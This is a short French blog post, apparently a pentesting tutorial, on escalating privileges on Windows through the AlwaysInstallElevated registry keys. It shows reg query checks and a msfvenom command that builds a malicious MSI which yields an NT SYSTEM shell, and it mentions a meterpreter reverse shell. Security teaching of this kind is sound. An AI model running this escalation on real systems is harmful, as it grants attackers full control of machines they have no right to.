AlwaysInstallElevated exploit

To the non-french speaker, note that you can translate the articles using the Google Trad widget situated at the bottom of all pages.

 


AlwaysInstallElevated est une clé de registre sous Windows qui permet à un utilisateur non privilégié, si elle est positionnée à 1, d’exécuter des fichiers d’installation MSI avec les droits NT System.

Au vu de la puissance de cette clé de registre, il devient nécessaire lorsque l’on arrive sur une machine Windows de vérifier si ces deux clés valent 1 :

-HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
-HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Pour cela on pourra se servir de ces commandes :

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
et
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

1.png

Par défaut ces clés n’existent pas. Par conséquent il faudra les rajouter manuellement si vous voulez tester la privesc. Les clés devront être de type REG_DWORD et valoir 1 :

2.png

Ensuite nous n’aurons plus qu’à forger un package MSI via msfvenom :

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi

L’uploader et l’exécuter pour obtenir un shell NT System :

3.png

Bien évidemment l’exploit fonctionnera aussi avec un reverse shell meterpreter :

4.png

La question maintenant c’est de savoir dans quelles conditions ces clés pourraient être activées. La seule réponse serait pour faciliter l’installation de packages aux  utilisateurs non privilégiés… Au vu de ce qu’on peut faire avec j’imagine qu’activer cette option n’est pas une si bonne idée 😉 !

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l'aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s